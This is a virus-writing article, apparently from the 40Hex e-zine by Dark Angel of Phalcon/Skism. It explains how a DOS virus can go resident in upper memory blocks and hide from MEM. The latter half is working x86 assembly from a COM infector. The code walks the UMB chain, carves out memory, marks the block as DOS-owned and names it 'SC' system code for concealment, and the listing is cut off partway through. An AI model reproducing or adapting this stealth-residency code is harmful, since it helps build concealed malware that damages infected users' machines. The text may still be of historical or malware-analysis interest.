ÍÍÍÍÍÍÍÍÍÍÍÍÍ UMB Residency ÍÍÍÍÍÍÍÍÍÍÍÍÍ By Dark Angel Phalcon/Skism ÍÍÍÍÍÍÍÍÍÍÍÍÍ One day, while fiddling with loading programs into MSDOS UMB's, I realised that there are very few viruses that used UMB's. This is surprising, given the prevalence of UMB's and the ease with which DOS viruses may hide their presence through the use of UMB's. The UMB's, or upper memory blocks, consist of the memory above 640K and below 1MB (segments A000 to FFFF). This region was reserved early on for BIOS and peripherals, notably video memory. There is normally plenty of unused space in this region, so enterprising programmers found a simple way to incorporate the memory into DOS's memory allocation scheme. They simply extended the MCB chain into that region, with MCB's indicating already allocated memory covering the memory used for other purposes by the machine. In this way, more memory, albeit fragmented, was usable for loading programs. The UMB's are especially handy for storing TSR's, since they have smaller memory constraints than most programs. The programmers at Microsoft, realising the utility of UMB's, decided to incorporate UMB's into DOS beginning at version 5, so now there is a standardised method of handling upper memory. The MCB's handling upper memory are slightly more complex than regular MCB's. The format of a UMB control block is: Offset Size Description 00 BYTE 'Z' if last MCB in chain, 'M' otherwise 01 WORD PSP segment of owner (8 if MSDOS, 0 if free) 03 WORD size of memory block in paragraphs 05 3 BYTES unused 08 8 BYTES program name in ASCII or "SC" if system code or "SD" if system data The method is pretty simple to understand and very easy to implement. In DOS 5+, the first UMB can be located through a pointer in the disk buffer information structure which, in turn, may be located through the DOS master list structure. This UMB is usually located at 9FFF:0000, but there is no need for this to be the case. It's simply the most convenient location for it. The only difference between modifying regular MCB's and UMB's is the extra field at offset 8 which may be used to mark the block as DOS system code. By marking this with DOS's usual fields to indicate unusuable memory such as video memory and ROM, we effectively hide the virus from detection by utilities such as MEM. Since it doesn't reside in conventional memory (below 640K), there is no decrease in memory a la 40:13 BIOS manipulating memory residency techniques. The sample code below, written for a simple COM infector, illustrates the technique. start: xor di,di mov ax,3306 ; get true DOS version int 21 inc al ; DOS 4-? jz no_UMBs ; if so, we don't have UMB's mov ah,52 ; get DOS master list int 21 ; structure lds si,es:[bx+12] ; get ptr to disk buffer info mov ax,ds:[si+1f] ; get address of the first UMB inc ax ; (FFFF if no UMBs present) jz no_UMBs dec ax ; undo damage from above search_chain: mov ds,ax ; go to the MCB cmp word ptr [di+1],di ; unused? jnz search_next cmp word ptr [di+3],reslength_P ; MCB large enough to ja handle_MCB ; hold us and our MCB? search_next: cmp byte ptr [di],'Z' ; end of chain? jz no_UMBs mov bx,[di+3] ; go to the next MCB inc ax ; 40Hex add ax,bx jmp search_chain no_UMBs: mov ax,cs dec ax ; get the MCB for current mov ds,ax ; program cmp word ptr [di+3],reslength_P + 1000 ; large enough for jna fail_init ; program and virus and its ; MCB? jmp short handle_MCB db 0,'(DA/PS)',0 handle_MCB: sub word ptr [di+3],reslength_P + 1 ; adjust size of memory ; area for virus + its MCB mov bx,[di+3] ; get size of new memory area mov cl,'M' ; make sure this MCB doesn't xchg cl,byte ptr [di] ; mark the end of the chain inc ax add ax,bx ; go to virus segment's MCB mov ds,ax mov es,ax mov byte ptr [di],cl ; patch end of chain indicator mov word ptr [di+1],8 ; mark MCB owned by DOS mov word ptr [di+3],reslength_P ; patch in virus size inc ax ; ds->virus segment mov ds,ax or di,8 ; go to program name field mov ax,'CS' ; make virus invisible to MEM stosw ; by pretending it is xor ax,ax ; DOS system code stosw stosw stosw